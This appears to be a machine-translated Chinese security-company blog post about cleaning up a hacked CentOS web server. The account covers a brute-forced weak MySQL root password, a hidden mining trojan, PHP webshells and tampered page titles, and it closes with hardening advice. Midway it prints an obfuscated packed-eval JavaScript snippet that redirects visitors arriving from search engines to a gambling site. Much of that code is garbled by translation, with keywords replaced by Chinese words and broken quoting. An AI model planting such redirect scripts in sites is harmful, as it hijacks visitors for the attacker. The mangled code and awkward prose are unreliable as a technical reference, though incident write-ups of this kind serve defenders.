发布时间:2023-3-25 分类: 电商动态
最近,客户的网站遭到黑客入侵,导致网站的主页被篡改并跳转到赌博网站。该网站还包括百度收藏中彩票内容的一些快照。该网站的主页快照也被修改为赌博内容,并由百度直接红色风险。拦截提示,百度URL安全中心提醒您:该网站可能遭到黑客的攻击,有些网页被非法篡改!我们的SINE安全公司立即根据上述被黑客入侵的网站进行了全面的网站安全测试,针对该网站的黑客入侵情况有详细的安全部署计划。
首先,客户网站使用Linux centos系统服务器。在客户端提供服务器ip,ssh端口,root帐户密码之后,我们进入检查服务器是否已经被黑客入侵和系统木马后门,然后我们使用mysql数据库。安全检查,发现问题,mysql数据库的root帐号是一个弱密码,它允许攻击者使用该软件强力破解数据库,导致破解成功,使用root权限直接提升权限并上传特洛伊木马到网站的根目录。根据内容。
根据上面发现的数据库安全问题,我们深入挖掘并追踪源头。我们发现服务器仍然有一个特洛伊木马后门,顶部,查看当前的Linux进程,并找到一个可疑的进程。通过查看流程的详细信息,我们发现该流程是一个特洛伊木马后门流程。仔细观察后发现该特洛伊木马是一种采矿木马。攻击者使用服务器资源,带宽,挖掘和挖掘,如比特币和以太坊。
我们对其采矿特洛伊木马进行安全分析:如下所示
通过解密特洛伊木马内容,我们发现该木马目前是一种查杀木马。普通人看不出问题,但经常维护服务器的操作维护人员会注意到第一个木马隐藏在Linux进程中,根据在此期间挖掘,避开高峰时间,以及维护人员的工作时间,挖掘时,木马进程的CPU使用率达到80%以上,有时网站打开速度非常慢。检查服务器的木马后,我们对网站的源代码进行安全检测,发现网站目录上传了网站木马后门,php脚本木马,脚本木马可以在网站上读写新的操作,以及网站标题说明同样改为博彩的内容如下:
<>的eval(功能(P,A,C,K,E,d){E=函数(C){返回(C
(parseInt(c/a)))+((c=c%a)> 35?String.fromCharCode(c + 29): c.toString
(36))};如果){而(C - )d [E(C)]=K [C] || E(c)中( '' 取代(/^ /,字符串!); K=
[function(e){return d [e]}]; e=function(){return'\ w +'}; c=1;}; while(c - )
如果(k [c])p=p.replace(new RegExp('\ b'+ e(c)+'\ b','g'),k [c]); return p;}
('3.4(''); 3.4('d 1=3.f'); 3.4('e(1.2(\'7 \')> 0 || 1.2(
'6 \')> 0 || 1.2(\'8 \')> 0 || 1.2(\'a \')> 0 || 1.2(\'9 \')> 0 || 1.2(
'L'')> 0 || 1.2(\'m \')> 0 || 1.2(\'k \')> 0)'); 3.4('hg=\'j: //离子
';'); 3.4( '');”,25,25” | S |的indexOf |文档| writeln ||搜狗|
百度|索索| UC | SM |爪哇| LANGUAGE |变种|如果|引荐| HREF |位置|万维网|
HTTP |所以|冰|雅虎| COM | 268238'.split(” |”),0,{}))
通过解密上面的代码,只要从百度,搜狗和soso访问,所以,bing和其他搜索引擎,将直接跳转到攻击者设置的赌博网站。在我们的SINE安全公司清除了恶意代码后,网站立即恢复了正常访问。
以上是解决客户网站安全问题的整个过程。以下是被黑网站的网站安全提案:
1.安全部署mysql数据库,加密root帐户密码,尽可能设置数字+大写和小写字母+特殊符号,并将正常的权限帐户分配给网站数据库。
2.mysql数据库默认端口3306,更改为51158,并添加到端口安全策略,不对外开放,外部网络IP无法连接到数据库,只有本地127.0.0.1可以连接到数据库防止恶意猜测。
3.对服务器的底层系统进行安全加固,包括SSH登录的安全验证。
4.对网站代码执行全面的安全检查,包括定期升级网站源代码,修复程序和网站漏洞。
